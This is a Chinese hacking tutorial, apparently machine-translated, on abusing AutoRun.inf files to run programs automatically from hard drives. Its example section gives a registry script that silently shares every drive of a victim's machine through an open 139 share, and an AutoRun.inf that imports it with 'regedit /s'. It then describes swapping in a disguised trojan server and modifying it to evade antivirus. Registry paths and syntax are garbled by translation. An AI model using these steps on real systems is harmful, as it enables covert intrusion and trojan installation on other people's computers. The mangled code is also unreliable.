最近网上流行共享对方所有硬盘或者通过AutoRun.inf文件中木马。由于AutoRun.inf文件在黑客技术中的应用还很少,相应的资料也不多,所以很多人对它感到很神秘。本文试图为你解开这个谜团,让你全面了解这项并不复杂却极其有趣的技术。
一.理论基础
经常使用光驱的朋友都知道,很多光驱放入光驱就会自动运行。他们是怎么做到的?光盘一放入光驱就会自动执行,主要依靠两个文件,一个是光盘上的AutoRun.inf文件,一个是操作系统本身的系统文件之一Cdvsd.vxd。在任何时候,vcd.vxd都会检测是否有将光盘放入光驱的动作,如果有,就会开始在光驱的根目录中寻找AutoRun.inf文件。如果AutoRun.inf文件存在,将执行其中的预设程序。
AutoRun.inf不仅可以让光盘自动运行程序,还可以让硬盘自动运行程序。方法很简单。首先打开记事本,然后用鼠标右键点击文件,在弹出菜单中选择'重命名'重命名为AutoRun.inf,在AutoRun.inf中键入以下内容:[AutoRun]//表示自动运行部分启动,必须输入Icon=C:C.ico//给出个性化的盘符图标C.icoOpen=C:1.exe//指定要运行的程序的路径和名称。这里假设文件将为1.exe保存在c盘下,按F5刷新桌面,再看‘我的电脑’(这里是c盘)里的盘符,你会发现它的磁盘图标已经变了。
解释:'[AutoRun]'行是必要的固定格式,' Icon '行对应图标文件,' C:C.ico '是图标文件路径和文件名。当您输入图像文件时,您可以将其更改为图像文件的路径和文件名。另外,‘。“ico”是图标文件的扩展名。如果你手头没有这种文件,可以用acdsee把其他格式的软件转换成ico格式,或者找一个后缀为BMP的文件,直接重命名为ICO文件。
“打开”行指定要自动运行的文件、其驱动器号和路径。特别是,如果你要更改的硬盘和目录中没有自动播放文件,你应该删除‘打开’行,否则你会因为找不到自动播放文件而无法打开硬盘。此时,您只能用鼠标右键单击驱动器号,并在弹出菜单中选择“打开”。
二。例子
举个例子:你扫描一台开着139共享的机器,对方只完全共享D盘,我们就得共享对方所有的盘。首先编辑注册表文件,打开记事本,并键入以下内容:
注册表4
这里必须有一个空行。
[HKEY _本地_机器软件微软windows当前版本
NetworkLanmanC$]
ath'='C:\ '
备注“=”
Type'=dword:00000000
Flags'=dword:00000302
armlenc '=十六进制:
arm2enc '=十六进制:
[HKEY _本地_机器软件微软windows当前版本
NetworkLanmanD$]
ath'='D:\ '
备注“=”
Type'=dword:00000000
Flags'=dword:00000302
armlenc '=十六进制:
arm2enc '=十六进制:
[HKEY _本地_机器软件微软windows当前版本
NetworkLanmanC$]
ath'='E:\ '
备注“=”
Type'=dword:00000000
Flags'=dword:00000302
armlenc '=十六进制:
arm2enc '=十六进制:
以上我只设置了驱动器e,如果对方有很多逻辑驱动器号,请自行设置。将以上部分保存为Share.reg文件,以备后用。特别注意REGEDIT4是用大写字母写的,后面是一个空行,记住在最后一行按一次Enter键。
然后打开记事本,编译AutoRun.inf文件,并键入以下内容:
[自动运行]
Open=regedit/sShare.reg//添加/s参数是为了保存AutoRun.inf文件,以便在导入过程中不显示任何信息。把Share.reg和AutoRun.inf两个文件都复制到对方的D盘根目录下,这样对方只要双击D盘就会把Share.reg导入注册表,这样重启后对方电脑的所有驱动器就完全共享了。
如果想让对方中木马,只需改‘开放=分享’即可。' Reg '到AutoRun.inf文件中的' Open=木马服务器文件名'然后将AutoRun.inf和配置好的木马服务器一起复制到对方D盘的根目录下,这样对方就不需要运行木马服务器程序,只需要双击D盘就可以让木马运行了!这样做的好处很明显,就是大大增加了木马运行的主动性!需要注意的是,现在很多人都很警惕。他们不能轻易运行不熟悉的文件,这种方法防不胜防。
需要注意的是,下载木马的人不会傻到不伪装木马。一般来说,他们会更改木马的服务器文件名,听起来很好听或者和系统的文件名很像。然后,他们会改变木马的图标,使它看起来像一个TXT文件,ZIP文件或图片文件等。最后,他们会修改木马的资源文件,使其不被杀毒软件识别(具体方法见网上文章)。当服务器用户信以为真时,木马悄然入侵。其实换个角度理解也不难。——如果你为别人下木马,我想你也会这么做。上面的手段辅以上面内容的AutoRun.inf文件,简直完美!
请注意:保存的文件名必须是' AutoRun.inf '准备好的Autorun.inf文件和图标文件必须放在硬盘的根目录下。再者,如果你某个硬盘的内容是临时固定的,你不妨用Flash做一个自动播放文件,然后编译一个‘Autorun’文件,那么你就拥有了一个最酷最个性化的硬盘。
它不在这里。众所周知,一些光盘放进去后,我们在它们的图标上点击鼠标右键,就会产生一个有特色的目录菜单。如果我们能在硬盘上点击鼠标右键产生同样的效果,那就更有特色了。实际上,光盘能有这样的效果,只是因为AutoRun.inf文件中有以下两条语句:
Shell flag=鼠标右键菜单中显示的内容。
标记shell命令=要执行的文件或命令行
所以要让硬盘有一个专门的目录菜单,在AutoRun.inf文件中添加上面的语句。